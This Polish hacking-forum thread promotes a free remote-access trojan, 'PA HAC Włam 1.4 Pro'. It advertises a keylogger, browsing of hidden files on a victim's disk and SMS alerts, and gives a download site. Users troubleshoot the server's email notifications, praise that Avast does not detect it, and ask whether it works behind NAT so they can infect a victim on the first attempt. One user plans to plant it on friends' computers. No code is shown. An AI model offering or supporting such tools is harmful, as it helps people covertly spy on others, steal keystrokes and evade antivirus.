PA HAC Włam 1.4 Pro bez zadnych blokad za free!!!!!

PA HAC

Użytkownik
Dołączył
Luty 24, 2004
Posty
63
Witam jest juz dostępny nowy PA HAC Włam 1.4 Pro pełna wersja bez ograniczeń. Posiafda miedzy innymi
+ pokazywnie plików ukrytych na dysku ofiary
+ powidomienie na sms
+ profesjonnalny keylogger
+ autoryzacja
+ zdjęcie wszytkich blokad
+ i wiele innych/ nie che mi sie pisac
sciągac z www.pahac.thc.net.pl z działu downloads.
 

haakier

Użytkownik
Dołączył
Wrzesień 7, 2004
Posty
15
Tylko dlaczego pojawia się błąd po restarcie systemu : Socket Error # 11001 Host not fund ?
 

PA HAC

Użytkownik
Dołączył
Luty 24, 2004
Posty
63
Stary opisz bardziej szczegółowo błąd czego sie tyczy serewra ?? klienta ??
----------------------------------------------------------------------------
A ten bład tyczy sie SMTP
<
w serwerze, zle go skonfigurowałes
<
 

haakier

Użytkownik
Dołączył
Wrzesień 7, 2004
Posty
15
Cześć , serwer skonfigurowałem dokladnie wedlug opisu i po uruchomieniu go u siebie na kompie wyskoczył błąd ale inny ale to jak rozumiem jest OK bo serwer zainstalował się w systemie, oczywiście odpalilem klijenta , dostałem e-mail tak jak to opisałeś z IP, hasłem i nazwą kompa , połączyłem się z serwerem i było ok , chociaż zauważyłem ,że pewne funkcje nie dzialają np wysuń CD Rom konfigurując server za pierwszym razem wpisałem klucz Winamp i nie zaznaczyłem opcji ukrywanie , po restarcie wywaliło mi właśnie ten błąd co pisałem , pomyślałem więc ,że powinienem chyba zaznaczyć tę opcję (może źle kombinowałem ale myślałem ,że to jest ten powód) więc wywaliłem server z Windowsa , usunołem RegCleaner-em klucz winamp , skonfigurowałem ponownie wybierając inny server ale nadal jest to samo , podejrzewam (może się myle ) ,że chyba problem jest w tym ,że po restarcie server może chce wysłać e-mail ale oczywiście komp jeszcze nie jest połączony z netem( jak już się podłącze do netu to wtedy nie przychodzi zaden e-mail) stąd może ten błąd ,uprzedzam ,ze nie jestem pewien więc pozostawcie sobie w spokoju pewne komentarze . Sam program jest dobry pod kątem niewykrywalności przez antyvirusa , tam gdzie chcę po podesłać pracuje Avast , u mnie po zaktualizowaniu nie wykrywa go , więc jest OK, problem tylko jest tak jak mówiłem z tym błędem po restarcie systemu , oczywiście każdy się skapnie ,że coś jest nie tak.
 

PA HAC

Użytkownik
Dołączył
Luty 24, 2004
Posty
63
Witaj!.
Po piertwsze to jakie masz łącze ze musisz sie podłaczac do neta. Tak to jest tego wina bo serwer na samy pocztku musi miec połaczenie z interentem. Jezeli nie ma połącznia(stałego dostępu do internetu), to wtedy wyskoczy ze nie moze znalesc hosta(to oczywiste). Wiec zeby błąd nie wyskakiwał musisz miec cały czas dostep do integernetu ja np. mam stałe łączei testuje na sobie moje trojany i jescze nighdy ne wyskoczył mi taki błąd, ale nie martw sie w nastepnej wersji dam cza po któerym ma sie wysłac e-mail i czy wogóle ma siew wysyłac
smile.gif

Pozdro.
 

haakier

Użytkownik
Dołączył
Wrzesień 7, 2004
Posty
15
Mam łącze radiowe a serwer miałby pracować na neostradzie więc Twój trojan na razie nie wchodzi w rachubę , szkoda bo jest dość ciekawy i niewykrywalny przynajmniej na razie .Pozdrowionka
 

PA HAC

Użytkownik
Dołączył
Luty 24, 2004
Posty
63
tzn. jaki jest problem jezeli masz stałe łącze to nie ma problemu czy neo czy jkaies inne gowno
<
 

haakier

Użytkownik
Dołączył
Wrzesień 7, 2004
Posty
15
jeśli chodzi o mnie to mam łacze radiowe ale muszę się logować do servera , natomiast błąd wyskakuje zaraz na początku otwierania się systemu tak,że nie ma możliwości abym szybciej się zalogował ,myślę ,że można by użyć c-dial ale wysyłanie e-maila musiało by miec jakąś zwłokę czasową ale to i tak nie ma sensu bo to nie o mój komp chodzi , natomiast jeśli chodzi o neostradę to nie bardzo kumam ,z tego co wiem to też trzeba się zalogować ( komp do którego chcę to podesłać przynajmniej ma taką konfigurację neostrady ) więc jeśli możesz to udziel mi wskazówki jak to można obejść aby na tym kompie nie wyskakiwał błąd . Wiem ,że to może nieistotne ale nie mam w zamiarze ,żadnych akcji destrukcyjnych poprostu to moi znajomi którzy mają blade pojęcie o komputerach stąd dobry poligon doświadczalny , oczywiście jakbym namieszał to i tak ja bym to musiał naprawiać , ale to tak dla ścisłości :)
 

Bozuch

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
49
Nop bede go testowal ale zapowiada sie niezla zabawa wersja polsko angielska i 1 opcj ktura mi sie odrazu w oczy zucila wywracanie pulpitu dogory nogami niezle
<
 

SNOOK3R

Użytkownik
Dołączył
Sierpień 2, 2004
Posty
6
Słuchaj autor
<

Mam tylko jedno podejście do ofiary więc z góry pytam czy on działa za NAT - em ... ??
 

Knexus

Użytkownik
Dołączył
Lipiec 2, 2003
Posty
118
dawno mnie tu nie bylo
<
lecz widze ze sie nic nie zmienilo
smile.gif
pytanko takie dziala nat-nat ?
 

vacand

Użytkownik
Dołączył
Listopad 28, 2004
Posty
1
Witam ja spotkalem sie z tym samym komunikatem...Jestem w LAN-ie i wyskakuje to samo po restarcie.Probowalem w innej sieci lokalnej i to samo...A kiedy wrzucilem komus server na XP-a to nie moge sie wogole z nim polaczyc tak jak by serwera wogole nie bylo
<
-moze przypadek ale raczej nie...
 

PA HAC

Użytkownik
Dołączył
Luty 24, 2004
Posty
63
Witam.
Błąd jest spowodwany złą konfiguracją serwera, gdy posiada sie zły host tak jest, lub gdy brak połączenia z internetem. Raczej na syetemach Win XP i 98 dobrez sie sprawuje
<
.
 

bee

Użytkownik
Dołączył
Wrzesień 11, 2004
Posty
1
PA HAC

dlaczego po wysłaniu serwera restarcie kompa serwera przy połączeniu pojawia sie bład - brak połaczenia
 

Elmo0000

Użytkownik
Dołączył
Grudzień 3, 2004
Posty
1
A jeszcze sie tak zapytam po co ja mam w opcji e-mail login i hasło?? smtp to czaje powiadomienie mailem jest na dole wiec po co jest opcja login i hasło??
 
Do góry Bottom